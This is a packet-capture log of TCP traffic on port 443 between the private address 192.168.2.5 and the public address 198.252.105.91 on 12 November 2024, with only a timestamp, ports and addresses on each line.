Nov 12, 2024 15:28:11.233475924 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.234249115 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.234278917 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.234317064 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.234322071 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.234355927 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.234411955 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.234431982 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.234442949 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.234447956 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.234467030 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.234504938 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.235255957 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.235272884 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.235327959 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.235332966 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.235375881 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.235775948 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.235794067 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.235838890 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.235843897 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.235871077 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.235877991 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.236589909 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.236608028 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.236682892 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.236687899 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.236730099 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.236757040 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.236772060 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.236809015 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.236813068 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.236838102 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.236860037 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.331110954 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.331144094 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.331240892 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.331269979 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.331327915 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.331507921 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.331532955 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.331581116 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.331587076 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.331621885 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.331629992 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.331882954 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.331898928 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.332005978 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.332012892 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.332060099 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.332320929 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.332336903 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.332401991 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.332406998 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.332449913 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.332935095 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.332950115 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.333003044 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.333009005 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.333055019 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.333425999 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.333441973 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.333498001 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.333503962 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.333549023 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.333719015 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.333733082 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.333791018 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.333795071 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.333836079 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.334273100 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.334287882 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.334342003 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.334347010 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.334395885 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.334445953 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.334466934 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.334515095 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.334520102 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.334546089 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.334583998 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.335062981 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.335082054 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.335130930 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.335135937 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.335177898 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.335591078 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.335609913 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.335655928 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.335659981 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.335681915 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.335707903 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.335948944 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.335966110 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.336030006 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.336034060 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.336100101 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.336257935 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.336272001 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.336321115 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.336324930 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.336368084 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.336786032 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.336803913 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.336862087 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.336867094 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.336910963 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.337620020 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.337636948 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.337694883 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.337701082 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.337763071 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.338215113 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.338228941 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.338275909 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.338282108 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.338308096 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.338315964 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.345072031 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.345097065 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.345139980 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.345160007 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.345302105 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.345302105 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.345453978 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.345472097 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.345523119 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.345532894 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.345577955 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.346021891 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.346038103 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.346098900 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.346110106 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.346147060 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.346879959 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.346899033 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.346947908 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.346962929 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.347002983 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.347145081 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.347160101 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.347206116 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.347213030 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.347246885 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.446202993 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.446235895 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.446305990 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.446340084 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.446362019 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.446379900 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.446382046 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.446394920 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.446419001 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.446451902 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.447299957 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.447321892 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.447354078 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.447360992 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.447380066 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.447406054 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.447868109 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.447886944 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.447958946 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.447967052 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.448003054 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.448518991 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.448533058 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.448596954 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.448602915 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.448643923 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.448846102 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.448862076 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.448914051 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.448919058 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.448960066 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.449104071 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.449120998 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.449171066 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.449174881 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.449218988 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.449680090 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.449701071 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.449734926 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.449739933 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.449770927 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.449795961 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.449892998 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.449907064 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.449940920 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.449945927 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.449984074 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.450001955 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.450031042 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.450047970 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.450087070 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.450090885 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.450140953 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.450675011 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.450691938 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.450742006 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.450747013 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.450784922 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.450942993 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.450958967 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.450995922 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.450999975 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.451019049 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.451044083 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.451335907 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.451351881 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.451389074 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.451392889 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.451423883 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.451437950 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.451565981 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.451581955 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.451626062 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.451631069 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.451668978 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.452285051 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.452303886 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.452338934 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.452342987 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.452369928 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.452383041 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.452661037 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.452677011 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.452708960 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.452713013 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.452743053 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.452759981 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.453380108 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.453397989 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.453439951 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.453449965 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.453464031 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.453488111 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.460422039 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.460447073 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.460511923 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.460524082 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.460557938 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.460578918 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.460711956 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.460733891 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.460788012 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.460793972 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.460836887 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.461462021 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.461477041 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.461525917 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.461530924 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.461572886 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.461817980 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.461832047 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.461889982 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.461899042 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.461916924 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.461955070 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.462059975 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.462074995 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.462131977 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.462138891 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.462177992 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.462384939 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.462399006 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.462452888 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.462459087 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.462500095 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.464936018 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.561819077 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.561853886 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.561924934 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.561958075 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.562011957 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.562027931 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.562051058 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.562082052 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.562088013 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.562139988 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.563116074 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.563132048 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.563194990 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.563210011 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.563246965 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.563546896 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.563561916 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.563613892 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.563621044 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.563683033 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.563987970 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.564011097 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.564049959 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.564057112 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.564075947 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.564115047 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.564387083 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.564404964 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.564454079 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.564466953 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.564505100 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.564776897 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.564794064 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.564850092 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.564858913 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.564898014 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.565304041 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.565323114 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.565363884 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.565371990 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.565395117 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.565414906 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.565485001 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.565505981 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.565547943 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.565553904 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.565578938 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.565601110 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.565823078 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.565839052 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.565893888 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.565900087 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.565943003 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.566082954 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.566102982 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.566148043 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.566154003 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.566188097 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.566498995 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.566514969 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.566566944 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.566571951 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.566615105 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.566910028 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.566929102 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.566989899 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.566996098 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.567032099 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.567295074 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.567325115 CET	443	49705	198.252.105.91	192.168.2.5
